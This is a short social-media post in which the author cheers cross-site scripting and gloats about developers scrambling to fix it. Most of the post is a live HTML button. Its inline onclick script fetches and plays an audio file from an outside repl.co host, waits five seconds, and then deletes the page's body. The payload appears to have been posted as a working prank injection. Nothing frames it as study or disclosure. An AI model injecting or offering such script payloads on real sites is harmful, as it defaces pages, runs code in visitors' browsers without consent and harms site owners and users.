jaxonbaxon @jaxonbaxon

I LOVE XSS!!! I LOVE WATCHING ALL OF THE DEVELOPERS OF A SITE SCRAMBLE TO FIX CROSS SITE SCRIPTING ISSUES!!!

<button onclick="
      const go = async () => {
          var aud = new Audio('https://gravetechnogreenware.jaxonbaxon.repl.co/game.mp3'); 
          const delay = ms => new Promise(res => setTimeout(res, ms)); 
          aud.play(); 
          await delay(5000); 
          document.body.remove(); 
      } 
      go();">delete everything on the page</button>
Oct 9, 2022, 4:19 PM
0

comments